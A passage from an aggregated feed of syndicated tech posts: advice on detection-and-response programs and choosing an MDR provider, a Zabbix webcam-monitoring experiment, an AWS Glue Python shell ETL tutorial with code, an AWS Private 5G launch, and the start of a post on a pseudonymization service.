While data fuels detection and response, too much of it will leave you wading through thousands of false positives and alert noise, making it hard to focus on the needle in a haystack full of other needles. The more data, the harder it is to understand which of those needles are sharp and which are dull.

So it ends up being about collecting the right data without turning your program into an alert machine. It’s key to understand which event sources to connect to your SIEM or XDR platform and what information is the most relevant. Typically, you’re on the right path if you’re aligning your event sources with use cases. The most impactful event sources we usually see ingested are:

Endpoint agents (including start/stop processes)
DHCP
LDAP
DNS
Cloud services (O365, IIS, load balancers)
VPN
Firewall
Web proxy
Active Directory for user attribution
For even greater detail, throw on network sensors, IDS, deception technology, and other log types

At the end of the day, gaining visibility into your assets, understanding user behaviors, collecting system logs, and piecing it all together will help you build a clearer picture of your environment. But analyzing all that data can prove challenging, especially for larger-scale environments.

That’s where Managed Security Service Providers (MSSP) and Managed Detection and Response (MDR) providers can come in to offload that element to a 24×7 team of experts.

2. Not prioritizing risks and outcomes

Not all D&R programs will focus on the same objectives. Different companies have different risks. For example, healthcare providers and retail chains will likely deal with threats unique to their respective industries. Hospitals, in particular, are prime targets for ransomware. Something as simple as not having two-factor authentication in place could leave a privileged account susceptible to a brute-force attack, creating wide-open access to medical records. It’s not overstating to say that could ultimately make it more difficult to save lives.

Taking this into account, your D&R program should identify the risks and outcomes that will directly impact your business. One of the big mistakes companies make is trying to cover all the bases while ignoring more targeted, industry-specific threats.

As mentioned above, healthcare is a heavily targeted industry. Phishing attacks like credential harvesting are extremely common. As we should all know by now, it can be disastrous for even one employee to click a suspicious link or open an attachment in an email. In the healthcare sector, customer and patient data were leaked about 58% of the time, or in about 25 out of 43 incidents. Adversaries can now move laterally with greater ease, quickly escalating privileges and getting what they want faster. And when extortion is the name of the game, the goal is often to disrupt mission-critical business operations. This can cripple a hospital’s ability to run, holding data for ransom and attempting to tarnish a company’s reputation in the process.

3. Finding help in the wrong place

Building a modern security operations center (SOC) today requires significant investments. An internal 24×7 SOC operation essentially needs around a dozen security personnel, a comprehensive security playbook with best practices clearly defined and outlined, and a suite of security tools that all go toward providing 24/7 monitoring. Compound these requirements with the cybersecurity skills shortage, and not many organizations will be able to set up or manage an internal SOC, let alone helm a fully operational D&R program. In a recent Forrester Consulting Total Economic Impact™ (TEI) study commissioned by Rapid7, it was identified that Rapid7’s MDR service was able to prevent security teams from hiring five full-time analysts – each at an annual salary of at least $135,000.

There are two critical mistakes organizations make that can send D&R programs down the wrong path:

Choosing to go it all alone and set up your own SOC without the right people and expertise
Partnering with a provider that doesn’t understand your needs or can’t deliver on what they promise

Partnering with an MDR provider is an effective way to ramp up security monitoring capabilities and fill this gap. But first, it’s important to evaluate an MDR partner across the following criteria:

Headcount and expertise: How experienced are the MDR analysts? Does the provider offer alert triage and investigation as well as digital forensics and incident response (DFIR) expertise?
Technology: What level of visibility will you have across the environment? And what detection methods will be used to find threats?
Collaboration and partnership: What do daily/monthly service interactions look like? Is the provider simply focused on security operations, or will they also help you advance your maturity?
Threat hunting: Will they go beyond real-time threat monitoring and offer targeted, human-driven threat hunting for unknown threats?
Process and service expectations: How will they help you achieve rapid time-to-value?
Managed response and incident response (IR) expertise: How will they respond on your behalf, and what will they do if an incident becomes a breach?
Security orchestration, automation, and response (SOAR): Will they leverage SOAR to automate processes?
Pricing: Will they price their solution to ensure transparency, predictability, and value?

An extension of your team

Services like MDR can enable you to obtain 24/7, remotely delivered SOC capabilities when you have limited or no existing internal detection and response expertise or need to augment your existing security operations team.

The key questions and critical areas of consideration discussed above can help you find the MDR partner who will best serve your needs — one who will provide the necessary MDR capabilities that can serve your short- and long-term needs. After all, the most important thing is that your organization comes out the other side better protected in the face of today’s threats.

Looking for more key considerations and questions to ask on your D&R journey to keeping your business secure? Check out our 2022 MDR Buyer’s Guide that details everything you need to know about evaluating MDR solutions.

Additional reading:

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

Security updates for Friday

2022-08-12

Post Syndicated from original https://lwn.net/Articles/904549/

Security updates have been issued by Debian (gnutls28, libtirpc, postgresql-11, and samba), Fedora (microcode_ctl, wpebackend-fdo, and xen), Oracle (.NET 6.0, galera, mariadb, and mysql-selinux, and kernel), SUSE (dbus-1 and python-numpy), and Ubuntu (booth).

Lafayette Pool: Texas Tanker

2022-08-12 The History Guy: History Deserves to Be Remembered

Post Syndicated from The History Guy: History Deserves to Be Remembered original https://www.youtube.com/watch?v=hNub9NIfYHE

A Taxonomy of Access Control

2022-08-12 Bruce Schneier

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2022/08/a-taxonomy-of-access-control.html

My personal definition of a brilliant idea is one that is immediately obvious once it’s explained, but no one has thought of it before. I can’t believe that no one has described this taxonomy of access control before Ittay Eyal laid it out in this paper. The paper is about cryptocurrency wallet design, but the ideas are more general. Ittay points out that a key—or an account, or anything similar—can be in one of four states:

safe Only the user has access,
loss No one has access,
leak Both the user and the adversary have access, or
theft Only the adversary has access.

Once you know these states, you can assign probabilities of transitioning from one state to another (someone hacks your account and locks you out, you forgot your own password, etc.) and then build optimal security and reliability to deal with it. It’s a truly elegant way of conceptualizing the problem.

What’s Up, Home? – Did You Really Turn Off Your Camera?

2022-08-12 Janne Pikkarainen

Post Syndicated from Janne Pikkarainen original https://blog.zabbix.com/whats-up-home-did-you-really-turn-off-your-camera/22697/

Can you monitor your webcam activity with Zabbix? Of course you can! By day, I work as a monitoring technical lead in a global cyber security company. By night, I monitor my home with Zabbix & Grafana and do some weird experiments with them. Welcome to my weekly blog about this project.

In a world where we work remote and have our web cameras on much of the time, you totally can forget to turn it off (or forget to toggle that physical webcam blindfold). Or, a Bad Hombre can lure something nasty to your computer and silently record your activities with it for any later evil consumption.

Scary, huh? Zabbix to the rescue!

Ssssshhhhh! Be very quiet, I am setting up a trap for uninvited visitors

Underneath, this thing works with a combination of zabbix_sender (spawned on my MacBook) and a Zabbix trapper item …

… with some preprocessing applied to it:

See, it works!

Easy bits first: See, this works!

Here’s latest data:

And here’s a graph:

In other words, my Zabbix can now tell if the web camera is on or not. I did not do any triggers for this yet, and for the most part this is just an inspirational post for y’all. Use Zabbix trigger conditions and create alerts such as:

Webcam is on but no usual webcam needing software (Teams, Zoom…) is found
Webcam is on even if the screen is locked
Webcam is on even if user is not logged in
Webcam is on in the middle of the night
Webcam is on even if nobody is home (according to your IoT monitoring setup)

This easily could add another layer to your security and privacy, as any suspicious usage of web camera (or, with similar technique, a microphone) can be detected in real time.

Headbang time

So, since I mostly use Mac for any webcam needs, I needed to get this working with a Mac. Unfortunately, as a Mac admin, I wear a yellow belt. For what it’s worth, I have an ancient MacBook Pro Retina mid-2012, running macOS Catalina.

First I thought this would be somehow easy, as I am already forwarding all the macOS syslog entries to my home syslog server (which is just the Raspberry Pi that also runs Zabbix & Grafana). Naive me thought that I could just look for kCameraStreamStart/Stop events via that log.

Little did I know, and this is where I request your help to make this sensible. I can see the log entries on my macOS in real-time with

log stream | grep “kCameraStream”

… but that does not want to save the thing in a log file if I try standard redirection with > or piping to tee or any other command, at least not without specifying a timeout value and then restarting the command.

Then there seems to be /etc/asl.conf and /etc/asl/ directory with many files, but my asl-fu is weak and I have no idea how to make it forward logs to remote syslog. I found out that in theory there’s a file parameter and I could store messages to file, which the standard syslog could then forward to my syslog server…. but I did not try out that route yet.

I know I could get the webcam status by using lsof but the trouble is that if the camera was on just for a very short time, it is possible to miss that with lsof.

For now, I have this terrible, terrible thing running background to see if the concept works, and I would like to get rid of this.

while true; do log show –last 2m | grep kCamera | tail -n1 | xargs -I ‘{}’ zabbix_sender -z my.zabbix.server -s “Personal MacBook Pro” -k webcam.power -o ‘{}’ ; sleep 30; done

So, how to make this as smooth as possible with Mac? Basically I just would need to forward more logs to my central log server, but did not yet figure out, how to do that.

I think that with Linux I could detect the use of /dev/video0 via audit log or setup an incron hook to trigger if /dev/video0 get accessed, but not totally sure as these are some murky waters for me, I am not usually spying my webcam.

I have been working at Forcepoint since 2014 and my co-workers have to stand the pain that is my stupid t-shirts.

This post was originally published on the author’s LinkedIn account

The post What’s Up, Home? – Did You Really Turn Off Your Camera? appeared first on Zabbix Blog.

AWS Glue Python shell now supports Python 3.9 with a flexible pre-loaded environment and support to install additional libraries

2022-08-12 Alunnata Mulyadi

Post Syndicated from Alunnata Mulyadi original https://aws.amazon.com/blogs/big-data/aws-glue-python-shell-now-supports-python-3-9-with-a-flexible-pre-loaded-environment-and-support-to-install-additional-libraries/

AWS Glue is the central service of an AWS modern data architecture. It is a serverless data integration service that allows you to discover, prepare, and combine data for analytics and machine learning. AWS Glue offers you a comprehensive range of tools to perform ETL (extract, transform, and load) at the right scale. AWS Glue Python shell jobs are designed for running small-to-medium size ETL, and triggering SQLs (including long-running queries) on Amazon Redshift, Amazon Athena, Amazon EMR, and more.

Today, we are excited to announce a new release of AWS Glue Python shell that supports Python 3.9 with more pre-loaded libraries. Additionally, it allows you to customize your Python shell environment with pre-loaded libraries and offers you PIP support to install other native or custom Python libraries.

The new release of AWS Glue Python shell includes the necessary Python libraries to connect your script to SQL engines and data warehouses like SQLAlchemy, PyMySQL, pyodbc, psycopg2, redshift, and more. It also supports communications with other AWS services such as Amazon OpenSearch Service (opensearch-py, elasticsearch), Amazon Neptune (gremlinpython), or Athena (PyAthena). It integrates Amazon SageMaker Data Wrangler for ETL tasks like loading and unloading data from data lakes, data warehouses, and databases. It also includes library support for data serialization in industry formats such as avro and et-xmlfile.

In this post, we walk you through on how to use AWS Glue Python shell to create an ETL job that imports an Excel file and writes it in a relational database and data warehouse. The job reads the Excel file as a Pandas DataFrame, creates a data profiling report, and exports it into your Amazon Simple Storage Service (Amazon S3) bucket. This routine cleans inaccurate information and imputes missing values based on predefined business rules. It writes the data into a target MySQL database for low-latency data access. Additionally, in parallel, the script exports the DataFrame in the data lake in columnar format to be copied into Amazon Redshift for reporting and visualization.

AWS Glue Python shell new features

The new release of AWS Glue Python shell allows you to use new features of Python 3.9 and add custom libraries to your script using job parameter configurations. This gives you more flexibility to write your Python code and reduces the need to manually maintain and update Python libraries needed for your code.

Customized pre-loaded library environments

AWS Glue Python shell for Python 3.9 comes with two library environment options:

analytics (default) – You can run your script in a fullly pre-loaded environment for complex analytics workloads. This option loads the full package of libraries.
none – You can choose an empty environment for simple and fast ETL jobs. This option only loads awscli and botocore as basic libraries.

You can set this option by using the library-set parameter in the job creation, for example:

"library-set":"analytics"

For your reference, the following table lists the libraries included in each option.

Python version	Python 3.9
Library set	analytics (default)	none
avro	1.11.0	.
awscli	1.23.5	1.23.5
awswrangler	2.15.1	.
botocore	1.23.5	1.23.5
boto3	1.22.5	.
elasticsearch	8.2.0	.
numpy	1.22.3	.
pandas	1.4.2	.
psycopg2	2.9.3	.
pyathena	2.5.3	.
PyMySQL	1.0.2	.
pyodbc	4.0.32	.
pyorc	0.6.0	.
redshift-connector	2.0.907	.
requests	2.27.1	.
scikit-learn	1.0.2	.
scipy	1.8.0	.
SQLAlchemy	1.4.36	.
s3fs	2022.3.0	.

Added support for library compilers

In this release, you can import and install libraries as part of the script, including your own C-based libraries. You have PIP support to install native or customer provided Python libraries with the support of the following compilers:

gcc
gcc-c++
gmake
cmake
cython
boost-devel
conda
python-dev

If you want to include a new package during your job creation, you can add the job parameter --additional-python-modules followed by the name of the library and the version. For example:

"--additional-python-modules":"boto3=1.22.13"

How to use the new features with the AWS Glue Python shell script

Now that we have introduced the new features, let’s create a Python 3.9 job with additional libraries with AWS Glue Python shell. You have two options to create and submit a job: you can use the interface of AWS Glue Studio, or the AWS Command Line Interface (AWS CLI) for a programmatic approach.

AWS Glue Studio

To use AWS Glue Studio, complete the following steps:

On the AWS Glue Studio console, create a new job and select Python Shell script editor.
Enter a job name and enter your Python script.
On the Job details tab, enter an optional description.
For IAM role¸ choose your job role.
For Python version, choose Python 3.9.
Select Load common Python libraries.
Choose the script and the temporary files locations.
Include the additional libraries as job parameters (--additional-python-modules).

AWS CLI

With the new release, you can now use the AWS CLI with the new parameters. The following is an example of an AWS CLI statement to create the AWS Glue Python shell script job with Python 3.9:

$ aws glue create-job 
--name <job_name> 
--role <glue_role> 
--command 
Name=pythonshell, 
PythonVersion=3.9, 
ScriptLocation=s3://<path_to_your_python_script>.py 
--default-arguments 
'{
    "--TempDir":"s3://<path_to_your_temp_dir>",
    "--job-language":"python",
    "library-set":"<analytics/default/none>",
    "--additional-python-modules":"<python package>=<version>, <>=<>"
}'
--connections <your_glue_connection> 
--timeout 30 
--max-capacity 0.0625

Let’s explore the main differences from the previous AWS Glue Python shell versions:

Set the option PythonVersion within the --command parameter to 3.9.
To add new libraries, use --additional-python-modules as a new parameter and then list the library and the required version as follows: boto3=1.22.13.
Include library-set within –default-arguments and choose one of the values, such as default/analytics/none.

Solution overview

This tutorial demonstrates the new features using a common use case where data flows into your system as spreadsheet files reports. In this case, you want to quickly orchestrate a way to serve this data to the right tools. This script imports the data from Amazon S3 into a Pandas DataFrame. It creates a profiling report that is exported into your S3 bucket as an HTML file. The routine cleans inaccurate information and imputes missing values based on predefined business rules. It writes the data directly from Python shell to an Amazon Relational Database Service (Amazon RDS) for MySQL server for low-latency app response. Additionally, it exports the data into a Parquet file and copies it into Amazon Redshift for visualization and reporting.

In our case, we treat each scenario as independent tasks with no dependency between them. You only need to create the infrastructure for the use cases that you want to test. Each section provides guidance and links to the documentation to set up the necessary infrastructure.

Prerequisites

There are a few requirements that are common to all scenarios:

Create an S3 bucket to store the input and output files, script, and temporary files.

Then, we create the AWS Identity and Access Management (IAM) user and role necessary to create and run the job.
Create an IAM AWS Glue service role called glue-blog-role and attach the AWS managed policy AWSGlueServiceRole for general AWS Glue permissions.If you’re also testing an Amazon Redshift or Amazon RDS use case, you need to grant the necessary permission to this role. For more information, refer to Using identity-based policies (IAM policies) for Amazon Redshift and Identity-based policy examples for Amazon RDS.
Create an IAM user with security credentials and configure your AWS CLI in your local terminal.
This allows you to create and launch your scripts from your local terminal. It is recommended to create a profile associated to this configuration.
```
$ aws configure --profile glue-python-shell
AWS Access Key ID
AWS Secret Access Key
Default region name
Default output format
```
The dataset used in this example is an Excel file containing Amazon Video Review data with the following structure. In a later step, we place the Excel file in our S3 bucket to be processed by our ETL script.
Finally, to work with sample data, we need four Python modules that were made available in AWS Glue Python shell when the parameter library-set is set to analytics:
1. boto3
2. awswrangler
3. PyMySQL
4. Pandas

Note that Amazon customer reviews are not licensed for commercial use. You should replace this data with your own authorized data source when implementing your application.

Load the data

In this section, you start writing the script by loading the data used in all the scenarios.

Import the libraries that we need:

import sys
import io
import os
import boto3
import pandas as pd
import awswrangler as wr
import pymysql
import datetime
from io import BytesIO

Read the Excel spreadsheet into a DataFrame:

AWS_S3_BUCKET = <your_s3_bucket_uri>
s3 = boto3.resource(
    service_name='s3',
    region_name='<your_s3_region>' 
)
obj = s3.Bucket(AWS_S3_BUCKET).Object('amazon_reviews_us_Video.xlsx').get()
df = pd.read_excel(io.BytesIO(obj['Body'].read())

Scenario 1: Data profiling and dataset cleaning

To assist with basic data profiling, we use the pandas-profiling module and generate a profile report from our Pandas DataFrame. Pandas profiling supports output files in JSON and HTML format. In this post, we generate an HTML output file and place it in an S3 bucket for quick data analysis.

To use this new library during the job, add the --additional-python-modules parameter from the job details page in AWS Glue Studio or during job creation from the AWS CLI. Remember to include this package in the imports of your script:

from pandas_profiling import ProfileReport
…
profile = ProfileReport(df)
s3.Object(AWS_S3_BUCKET,'output-profile/profile.html').put(Body=profile.to_html())

A common problem that we often see when dealing with a column’s data type is the mix of data types are identified as an object in a Pandas DataFrame. Mixed data type columns are flagged by pandas-profiling as Unsupported type and stored in the profile report description. We can access the information and standardize it to our desired data types.

The following lines of code loop every column in the DataFrame and check if any of the columns are flagged as Unsupported by pandas-profiling. We then cast it to string:

for col in df.columns:
    if (profile.description_set['variables'][col]['type']) == 'Unsupported':
        df[col] = df[col].astype(str)

To further clean or process your data, you can access variables provided by pandas-profiling. The following example prints out all columns with missing values:

for col in df.columns:
    if profile.description_set['variables'][col]['n_missing'] > 0:
        print (col, " is missing ", profile.description_set['variables'][col]['n_missing'], " data type ", profile2.description_set['variables'][col]['type'])
        #missing data handling
        #....

Scenario 2: Export data in columnar format and copy it to Amazon Redshift

In this scenario, we export our DataFrame into Parquet columnar format, store it in Amazon S3, and copy it to Amazon Redshift. We use Data Wrangler to connect our script to Amazon Redshift. This Python module is already included in the analytics environment. Complete the following steps to set up the necessary infrastructure:

Create an Amazon Redshift cluster in same Region as the AWS Glue Python shell job.
Create an AWS Glue Data Catalog connection with Amazon Redshift. Remember that creating a connection also requires a VPC endpoint for Amazon S3.

Now we can write raw data to Amazon S3 in Parquet format and to Amazon Redshift.

A common partition strategy is to divide rows by year, month, and day from your date column and apply multi-level partitioning. This approach allows fast and cost-effective retrieval for all rows assigned to a particular year, month, or date. Another strategy to partition your data is by using a specific column directly. For example, using review_date as a partition gives you single level of directory for every unique date and stores the corresponding data in it.

In this post, we prepare our data for the multi-level date partitioning strategy. We start by extracting year, month, and day from our date column:

df['day']= pd.DatetimeIndex(df['review_date']).day.astype(str)
df['month']= pd.DatetimeIndex(df['review_date']).month.astype(str)
df['year']= pd.DatetimeIndex(df['review_date']).year.astype(str)

With our partition columns ready, we can use the awswrangler module to write to Amazon S3 in Parquet format:

wr.s3.to_parquet(
    df=df,
    path="s3://<your_output_s3_bucket>", #change this value with path to your bucket
    dataset=True,
    mode="overwrite",       
    partition_cols=['year','month','day']

To query your partitioned data in Amazon S3, you can use Athena, our serverless interactive query service. For more information, refer to Partitioning data with Athena.

Next, we write our DataFrame directly to Amazon Redshift internal storage by using Data Wrangler. Writing to Amazon Redshift internal storage is advised when you’re going to use this data frequently for complex analytics, large SQL operations, or business intelligence (BI) reporting. In Amazon Redshift, it’s advised to define the distribution style and sort key on the table to improve cluster performance. If you’re not sure about the right value for those parameters, you can use the Amazon Redshift auto distribution style and sort key and follow Amazon Redshift advisor recommendations. For more information on Amazon Redshift data distribution, refer to Working with data distribution styles.

#drop review columns and preserve other columns for analysis
df = df.drop(['review_body','review_headline'], axis=1)

#generate dictionary with length to be used by awswrangler to create varchar columns
max_length_object_cols = {col: df.loc[:, col].astype(str).apply(len).max() for col in df.select_dtypes([object]).columns}

#connect to Redshift via Glue connection
con = wr.redshift.connect("<your_glue_connection>")

#copy DataFrame into Redshift table 
wr.redshift.copy(
    df=df,
    path=<temporarty path for staging files>,
    con=con,
    table="<your_redshift_table_name>", #awswrangler will create table if it does not exist
    schema="<your_redshift_schema>",
    mode="overwrite",
    iam_role=<your_iam_role_arn_with_permission_to_redshift>,
    varchar_lengths= max_length_object_cols,
	   diststyle="AUTO",
    )

#close connection    
con.close()

Scenario 3: Data ingestion into Amazon RDS

In this scenario, we open a connection between AWS Glue Python shell and ingest the data directly into Amazon RDS for MySQL. The infrastructure you require for this scenario is an RDS for MySQL database in the same Region as the AWS Glue Python shell job. For more information, refer to Creating a MySQL DB instance and connecting to a database on a MySQL DB instance.

With the PyMySQL and boto3 modules, we can now connect to our RDS for MySQL database and write our DataFrame into a table.

Prepare the variables for connection and generate a database authentication token for database login:

#RDS connection details
MYSQL_ENDPOINT = "<mysql_endpoint>"
PORT= "3306"
USER= "<mysql_username>"
REGION = "<region_for_rds_mysql>"
DBNAME = "<database_name>"
session = boto3.Session(profile_name='<your_aws_profile>')
client = session.client('rds')

#generate db authentication token 
token = client.generate_db_auth_token(DBHostname=MYSQL_ENDPOINT, Port=PORT, DBUsername=USER, Region=REGION)

#connect to database
connection = pymysql.connect(host=MYSQL_ENDPOINT,
    user=USER,
    password=token,
    db=DBNAME,
    ssl_ca='global-bundle.pem')
    
#arrange columns and values for SQL insert statement    
columns = ','.join(df.columns)
values=','.join(['%s'.format(i+1) for i in range(len(df.columns))])

#SQL statement to insert into RDS
load_sql = f"INSERT INTO demo_blog.amazon_video_review({columns:}) VALUES ({values:})"

For more information about using an SSL connection with your RDS instance, refer to Using SSL/TLS to encrypt a connection to a DB instance.

Connect to your RDS for MySQL database and write a Pandas DataFrame into the table with the following code:

try:
    with connection.cursor() as cur:
        cur.executemany(load_sql, df.values.tolist())
    connection.commit()
finally:
    cur.close()

You need to create a table in Amazon RDS for MySQL prior to running the insert statement. Use the following DDL to create the demo_blog.amazon_video_review table:

CREATE TABLE `amazon_video_review` (
  `marketplace` varchar(100) NOT NULL,
  `customer_id` bigint NOT NULL,
  `review_id` varchar(100) DEFAULT NULL,
  `product_id` varchar(100) DEFAULT NULL,
  `product_parent` bigint NOT NULL,
  `product_title` varchar(100) DEFAULT NULL,
  `product_category` varchar(100) DEFAULT NULL,
  `star_rating` bigint NOT NULL,
  `helpful_votes` bigint NOT NULL,
  `total_votes` bigint NOT NULL,
  `vine` varchar(100) DEFAULT NULL,
  `verified_purchase` varchar(100) DEFAULT NULL,
  `review_headline` varchar(100) DEFAULT NULL,
  `review_body` varchar(5000) DEFAULT NULL,
  `review_date` date NOT NULL,
  `year` varchar(100) DEFAULT NULL,
  `month` varchar(100) DEFAULT NULL,
  `date` varchar(100) DEFAULT NULL,
  `day` varchar(100) DEFAULT NULL
)

When the data is available in database, you can perform a simple aggregation as follows:

agg_sql="insert into demo_blog.video_review_recap select product_title , year as review_year, count(*) as total_review, sum(case when verified_purchase=\"Y\" then 1 else 0 end) as total_verified_purchase,sum(case when verified_purchase=\"N\" then 1 else 0 end) as total_unverified_purchase from demo_blog.amazon_video_review avr group by 1 order by 2 DESC"
cursor = connection.cursor()
cursor.execute(agg_sql)

Create and run your job

After you finalize your code, you can run it from AWS Glue Studio or save it in a script .py file and submit a job with the AWS CLI. Remember to add the necessary parameters in your job creation depending of the scenario you’re testing. The following job parameters cover all the scenarios:

--command pythonVersion=3.9 …
--default-arguments '{"library-set":"analytics" , "--additional-python-modules":"pandas_profile", …}'

Review the results

In this section, we review the expected results for each scenario.

In Scenario 1, pandas-profiling generates a data report in HTML format. In this report, you can visualize missing values, duplicated values, size estimations, or correlations between columns, as shown in the following screenshots.

For Scenario 2, you can first review the Parquet file written to Amazon S3 in Parquet format with partition year/month/day.

Then you can use the Amazon Redshift query editor to query and visualize the data.

For Scenario 3, you can use a JDBC connection or database IDE to connect to your RDS database and query the data that you just ingested.

Clean up

AWS Glue Python shell is a serverless routine that won’t incur in any extra charges when it isn’t running. However, this demo used several services that will incur in extra costs. Clean up after completing this walkthrough with the following steps:

Remove the contents of your S3 bucket and delete it. If you encounter any errors, refer to Why can’t I delete my S3 bucket using the Amazon S3 console or AWS CLI, even with full or root permissions.
Stop and delete the RDS DB instance. For instructions, see Deleting a DB instance.
Stop and delete the Amazon Redshift cluster. For instructions, refer to Deleting a cluster.

Conclusion

In this post, we introduced AWS Glue Python shell with Python 3.9 support and more pre-loaded libraries. We presented the customizable Python shell environment with pre-loaded libraries and PIP support to install other native or custom Python libraries. We covered the new features and how to get started through AWS Glue Studio and the AWS CLI. We also demonstrated a step-by-step tutorial of how you can easily use these new capabilities to accomplish common ETL use cases.

To learn more about AWS Glue Python shell and this new feature, refer to Python shell jobs in AWS Glue.

About the authors

Alunnata Mulyadi is an Analytics Specialist Solutions Architect at AWS. Alun has over a decade of experience in data engineering, helping customers address their business and technical needs. Outside of the work, he enjoys photography, cycling, and basketball.

Quim Bellmunt is an Analytics Specialist Solutions Architect at Amazon Web Services. Quim has a PhD in Computer Science and Knowledge Graph focusing on data modeling and transformation. With over 6 years of hands-on experience in the analytics and AI/ML space, he enjoys helping customers create systems that scale with their business needs and generate value from their data. Outside of the work, he enjoys walking with his dog and cycling.

Kush Rustagi is a Software Development Engineer on the AWS Glue team with over 4 years of experience in the industry having worked on large-scale financial systems in Python and C++, and is now using his scalable system design experience towards cloud development. Before working on Glue Python Shell, Kush worked on anomaly detection challenges in the fin-tech space. Aside from exploring new technologies, he enjoys EDM, traveling, and learning non-programming languages.

Coffee Cup Holes

2022-08-12

Post Syndicated from original https://xkcd.com/2658/

Theoretical physicist: At the Planck length, uncountably many.

New – AWS Private 5G – Build Your Own Private Mobile Network

2022-08-12 Jeff Barr

Post Syndicated from Jeff Barr original https://aws.amazon.com/blogs/aws/new-aws-private-5g-build-your-own-private-mobile-network/

Back in the mid-1990’s, I had a young family and 5 or 6 PCs in the basement. One day my son Stephen and I bought a single box that contained a bunch of 3COM network cards, a hub, some drivers, and some cables, and spent a pleasant weekend setting up our first home LAN.

Introducing AWS Private 5G
Today I would like to introduce you to AWS Private 5G, the modern, corporate version of that very powerful box of hardware and software. This cool new service lets you design and deploy your own private mobile network in a matter of days. It is easy to install, operate, and scale, and does not require any specialized expertise. You can use the network to communicate with the sensors & actuators in your smart factory, or to provide better connectivity for handheld devices, scanners, and tablets for process automation.

The private mobile network makes use of CBRS spectrum. It supports 4G LTE (Long Term Evolution) today, and will support 5G in the future, both of which give you a consistent, predictable level of throughput with ultra low latency. You get long range coverage, indoors and out, and fine-grained access control.

AWS Private 5G runs on AWS-managed infrastructure. It is self-service and API-driven, and can scale with respect to geographic coverage, device count, and overall throughput. It also works nicely with other parts of AWS, and lets you use AWS Identity and Access Management (IAM) to control access to both devices and applications.

Getting Started with AWS Private 5G
To get started, I visit the AWS Private 5G Console and click Create network:

I assign a name to my network (JeffCell) and to my site (JeffSite) and click Create network:

The network and the site are created right away. Now I click Create order:

I fill in the shipping address, agree to the pricing (more on that later), and click Create order:

Then I await delivery, and click Acknowledge order to proceed:

The package includes a radio unit and ten SIM cards. The radio unit requires AC power and wired access to the public Internet, along with basic networking (IPv4 and DHCP).

When the order arrives, I click Acknowledge order and confirm that I have received the desired radio unit and SIMs. Then I engage a Certified Professional Installer (CPI) to set it up. As part of the installation process, the installer will enter the latitude, longitude, and elevation of my site.

Things to Know
Here are a couple of important things to know about AWS Private 5G:

Partners – Planning and deploying a private wireless network can be complex and not every enterprise will have the tools to do this work on their own. In addition, CBRS spectrum in the United States requires Certified Professional Installation (CPI) of radios. To address these needs, we are building an ecosystem of partners that can provide customers with radio planning, installation, CPI certification, and implementation of customer use cases. You can access these partners from the AWS Private 5G Console and work with them through the AWS Marketplace.

Deployment Options – In the demo above, I showed you the cloud–based deployment option, which is designed for testing and evaluation purposes, for time-limited deployments, and for deployments that do not use the network in latency-sensitive ways. With this option, the AWS Private 5G Mobile Core runs within a specific AWS Region. We are also working to enable on-premises hosting of the Mobile Core on a Private 5G compute appliance.

CLI and API Access – I can also use the create-network, create-network-site, and acknowledge-order-receipt commands to set up my AWS Private 5G network from the command line. I still need to use the console to place my equipment order.

Scaling and Expansion – Each network supports one radio unit that can provide up to 150 Mbps of throughput spread across up to 100 SIMs. We are working to add support for multiple radio units and greater number of SIM cards per network.

Regions and Locations – We are launching AWS Private 5G in the US East (Ohio), US East (N. Virginia), and US West (Oregon) Regions, and are working to make the service available outside of the United States in the near future.

Pricing – Each radio unit is billed at $10 per hour, with a 60 day minimum.

To learn more, read about AWS Private 5G.

— Jeff;

Tesla Solar Pricing Hack (Short)

2022-08-12 The Hook Up

Post Syndicated from The Hook Up original https://www.youtube.com/watch?v=v1-TN1FkSXw

Build a pseudonymization service on AWS to protect sensitive data, part 1

2022-08-11 Rahul Shaurya

Post Syndicated from Rahul Shaurya original https://aws.amazon.com/blogs/big-data/part-1-build-a-pseudonymization-service-on-aws-to-protect-sensitive-data/

According to an article in MIT Sloan Management Review, 9 out of 10 companies believe their industry will be digitally disrupted. In order to fuel the digital disruption, companies are eager to gather as much data as possible. Given the importance of this new asset, lawmakers are keen to protect the privacy of individuals and prevent any misuse. Organizations often face challenges as they aim to comply with data privacy regulations like Europe’s General Data Protection Regulation (GDPR) and the California Consumer Privacy Act (CCPA). These regulations demand strict access controls to protect sensitive personal data.

This is a two-part post. In part 1, we walk through a solution that uses a microservice-based approach to enable fast and cost-effective pseudonymization of attributes in datasets. The solution uses the AES-GCM-SIV algorithm to pseudonymize sensitive data. In part 2, we will walk through useful patterns for dealing with data protection for varying degrees of data volume, velocity, and variety using Amazon EMR, AWS Glue, and Amazon Athena.

Data privacy and data protection basics

Before diving into the solution architecture, let’s look at some of the basics of data privacy and data protection. Data privacy refers to the handling of personal information and how data should be handled based on its relative importance, consent, data collection, and regulatory compliance. Depending on your regional privacy laws, the terminology and definition in scope of personal information may differ. For example, privacy laws in the United States use personally identifiable information (PII) in their terminology, whereas GDPR in the European Union refers to it as personal data. Techgdpr explains in detail the difference between the two. Through the rest of the post, we use PII and personal data interchangeably.

Data anonymization and pseudonymization can potentially be used to implement data privacy to protect both PII and personal data and still allow organizations to legitimately use the data.

Anonymization vs. pseudonymization

Anonymization refers to a technique of data processing that aims to irreversibly remove PII from a dataset. The dataset is considered anonymized if it can’t be used to directly or indirectly identify an individual.

Pseudonymization is a data sanitization procedure by which PII fields within a data record are replaced by artificial identifiers. A single pseudonym for each replaced field or collection of replaced fields makes the data record less identifiable while remaining suitable for data analysis and data processing. This technique is especially useful because it protects your PII data at record level for analytical purposes such as business intelligence, big data, or machine learning use cases.

The main difference between anonymization and pseudonymization is that the pseudonymized data is reversible (re-identifiable) to authorized users and is still considered personal data.

Solution overview

The following architecture diagram provides an overview of the solution.

Solution overview

This architecture contains two separate accounts:

Central pseudonymization service: Account 111111111111 – The pseudonymization service is running in its own dedicated AWS account (right). This is a centrally managed pseudonymization API that provides access to two resources for pseudonymization and reidentification. With this architecture, you can apply authentication, authorization, rate limiting, and other API management tasks in one place. For this solution, we’re using API keys to authenticate and authorize consumers.
Compute: Account 222222222222 – The account on the left is referred to as the compute account, where the extract, transform, and load (ETL) workloads are running. This account depicts a consumer of the pseudonymization microservice. The account hosts the various consumer patterns depicted in the architecture diagram. These solutions are covered in detail in part 2 of this series.

The pseudonymization service is built using AWS Lambda and Amazon API Gateway. Lambda enables the serverless microservice features, and API Gateway provides serverless APIs for HTTP or RESTful and WebSocket communication.

